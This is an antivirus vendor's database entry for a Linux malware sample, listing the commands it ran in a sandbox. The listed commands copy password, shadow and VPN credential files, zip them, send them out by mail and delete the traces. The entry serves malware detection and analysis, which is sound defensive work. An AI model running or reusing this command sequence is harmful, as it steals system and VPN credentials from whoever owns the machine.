Linux.Siggen.4073
Added to the Dr.Web virus database:
2021-07-29
Virus description added:
2021-07-28
Technical Information
Malicious functions:
Gains root privileges
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- wget -qO- ipinfo.io/ip
- clear
- date +%Y-%m-%d
- sleep 1
- mkdir /root/backup
- cp /etc/passwd backup/
- cp /etc/group backup/
- cp /etc/shadow backup/
- cp /etc/gshadow backup/
- cp -r /etc/wireguard backup/wireguard
- cp /etc/ppp/chap-secrets backup/chap-secrets
- cp /etc/ipsec.d/passwd backup/passwd1
- cp /etc/shadowsocks-libev/akun.conf backup/ss.conf
- cp -r /var/lib/premium-script/ backup/premium-script
- cp -r /home/sstp backup/sstp
- cp -r /etc/v2ray backup/v2ray
- cp -r /etc/trojan backup/trojan
- cp -r /usr/local/shadowsocksr/ backup/shadowsocksr
- cp -r /home/vps/public_html backup/public_html
- zip -r 95.211.190.198-2021-07-29.zip backup
- grep ^https
- cut -d= -f2
- mail -s Backup Data
- rm -rf /root/backup
- rm -r /root/95.211.190.198-2021-07-29.zip
Performs operations with the file system:
Modifies file access rights:
- /root/95.211.190.198-2021-07-29.zip
Creates folders:
Creates or modifies files:
- /root/backup/passwd
- /root/backup/group
- /root/backup/shadow
- /root/backup/gshadow
- /root/95.211.190.198-2021-07-29.zip
- /root/ziHuMskh
Deletes files:
- /root/95.211.190.198-2021-07-29.zip
- /root/passwd
- /root/shadow
- /root/group
- /root/gshadow
Network activity:
Establishes connection:
HTTP GET requests:
DNS ASK:
Curing recommendations
Linux